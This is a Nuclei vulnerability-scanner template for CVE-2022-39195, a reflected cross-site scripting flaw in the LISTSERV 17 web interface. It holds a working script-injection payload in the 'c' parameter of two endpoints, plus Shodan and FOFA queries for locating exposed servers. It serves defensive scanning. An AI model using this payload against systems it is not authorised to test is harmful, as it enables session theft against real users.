nuclei-templates/http/cves/2022/CVE-2022-39195.yaml

63 lines
2.4 KiB
YAML

id: CVE-2022-39195
info:
name: LISTSERV 17 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
- https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
- https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2022-39195
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-39195
cwe-id: CWE-79
epss-score: 0.00211
epss-percentile: 0.59024
cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: lsoft
product: listserv
shodan-query:
- http.html:"LISTSERV"
- http.html:"listserv"
fofa-query: body="listserv"
tags: cve,cve2022,xss,listserv,packetstorm,lsoft
http:
- method: GET
path:
- "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
- "LISTSERV"
case-insensitive: true
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502204cd9a877de69668bc2a7891aa654a7d70d30004120c13e29a87790f6a26b1636022100b2752777060d9297dc81a092d31abda719a0b244d1b6639dc032c75d6f58dc1a:922c64590222798bb761d5b6d8e72950